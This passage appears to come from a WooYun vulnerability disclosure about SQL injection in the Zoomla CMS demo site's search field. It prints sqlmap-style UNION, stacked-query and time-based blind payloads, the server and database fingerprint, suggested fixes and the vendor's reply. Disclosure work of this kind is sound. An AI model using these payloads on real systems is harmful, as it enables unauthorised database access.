jVkAgMPDxYCHwIFBiZuYnNwO2RkAgQPZBYCZg8VAhvlpJrpl6jmiLflrZDnq5nliIfmjaLns7vnu58b5aSa6Zeo5oi35a2Q56uZ5YiH5o2i57O757ufZAIFDw8WAh8CBQ4xMTYuMjA3LjU1LjIxMGRkAgYPZBYCZg8VAQnlvoXnoa7orqRkAgcPZBYOZg9kFgJmDxUBAjM5ZAIBDw8WAh8CBQIzOWRkAgIPZBYCZg8VARMyMDE0LTA4LTAyIDA5OjQ4OjIxZAIDDw8WAh8CBQYmbmJzcDtkZAIED2QWAmYPFQIb5aSa6Zeo5oi35a2Q56uZ5YiH5o2i57O757ufG+WkmumXqOaIt+WtkOermeWIh+aNouezu+e7n2QCBQ8PFgIfAgUOMTAxLjIyNi41MS4yMjhkZAIGD2QWAmYPFQEJ5b6F56Gu6K6kZAIID2QWDmYPZBYCZg8VAQI0MGQCAQ8PFgIfAgUCNDBkZAICD2QWAmYPFQETMjAxNC0wOC0wMiAyMDowNToyOWQCAw8PFgIfAgUFYWRtaW5kZAIED2QWAmYPFQIn6J6N6IGa56e75Yqo5bqU55So5LiO5qGM6Z2i6L2v5Lu25bmz5Y+wJ+iejeiBmuenu+WKqOW6lOeUqOS4juahjOmdoui9r+S7tuW5s+WPsGQCBQ8PFgIfAgULNTguNTAuMTQuOTlkZAIGD2QWAmYPFQEJ5b6F56Gu6K6kZAIJD2QWDmYPZBYCZg8VAQI0MWQCAQ8PFgIfAgUCNDFkZAICD2QWAmYPFQETMjAxNC0wOC0wMyAwNDoyMzo1NWQCAw8PFgIfAgUGJm5ic3A7ZGQCBA9kFgJmDxUCJOWNg+S4h+e6p+aVsOaNruW6k+i0n+i9vea1i+ivlee6p+WIqyTljYPkuIfnuqfmlbDmja7lupPotJ/ovb3mtYvor5XnuqfliKtkAgUPDxYCHwIFDzE4MC4xNTMuMjA1LjI1M2RkAgYPZBYCZg8VAQnlvoXnoa7orqRkAgoPZBYOZg9kFgJmDxUBAjQyZAIBDw8WAh8CBQI0MmRkAgIPZBYCZg8VARMyMDE0LTA4LTAzIDA0OjIzOjU1ZAIDDw8WAh8CBQYmbmJzcDtkZAIED2QWAmYPFQIk5Y2D5LiH57qn5pWw5o2u5bqT6LSf6L295rWL6K+V57qn5YirJOWNg+S4h+e6p+aVsOaNruW6k+i0n+i9vea1i+ivlee6p+WIq2QCBQ8PFgIfAgUNMTQuMTA3LjIwNS45MWRkAgYPZBYCZg8VAQnlvoXnoa7orqRkAgsPDxYCHgdWaXNpYmxlaGRkAgwPZBYCZg9kFgQCAQ8PFgIfAgUCMzJkZAIWDxAPFgIfA2dkEBUEATEBMgEzATQVBAExATIBMwE0FCsDBGdnZ2cWAWZkGAEFEWN0bDAwJENvbnRlbnQkRWd2DzwrAAwDBhUBAklEBxQrAAoUKwABAiEUKwABAiIUKwABAiMUKwABAiQUKwABAiUUKwABAiYUKwABAicUKwABAigUKwABAikUKwABAioIAgRkmIUN+QajY8XCYHl94YGf479+Juhbv5otzNBlCeQ9aRk=
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$txtTitle"
123456%' UNION ALL SELECT CHAR(113)+CHAR(114)+CHAR(121)+CHAR(105)+CHAR(113)+CHAR(100)+CHAR(87)+CHAR(122)+CHAR(70)+CHAR(88)+CHAR(112)+CHAR(69)+CHAR(101)+CHAR(77)+CHAR(72)+CHAR(113)+CHAR(117)+CHAR(121)+CHAR(105)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$txtTime"
2014-08
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$btnSeach"
??��������
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl06"
10
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl07"
1
------WebKitFormBoundary5n6dB9dFzpkAYygr--
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: ------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__EVENTTARGET"
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__EVENTARGUMENT"
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__LASTFOCUS"
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__VIEWSTATE"
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
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$txtTitle"
123456%'; WAITFOR DELAY '0:0:5'--
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$txtTime"
2014-08
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$btnSeach"
??��������
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl06"
10
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl07"
1
------WebKitFormBoundary5n6dB9dFzpkAYygr--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: ------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__EVENTTARGET"
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__EVENTARGUMENT"
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__LASTFOCUS"
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__VIEWSTATE"
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
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$txtTitle"
123456%' WAITFOR DELAY '0:0:5'--
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$txtTime"
2014-08
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$btnSeach"
??��������
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl06"
10
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl07"
1
------WebKitFormBoundary5n6dB9dFzpkAYygr--
---
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.5
back-end DBMS: Microsoft SQL Server 2008
current user:    'demozoomla_f'


c.商城管理的明细记录处:

zoomla1.jpg


zoomla2.jpg


d.企业黄页的黄页内容管理的搜索处

zoomla1.jpg


e.企业黄页的黄页标签管理的搜索处

zoomla1.jpg

修复方案:

验证码设计错误
修复搜索型注入点

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-08-06 13:19

厂商回复:

我们的后台安全机制通过以下几个方式来保障:
1、三次登陆出现验证码,即贵文所呈问题。
2、安全码,默认不启用,可以启用之加强安全,预置的安全码。
3、可变更的后台路径,对于demo我们是开放后台路径,而后台事实是一个变更的值。
感谢贵文反馈的安全问题,我们将加强并尽快改进。

最新状态:

暂无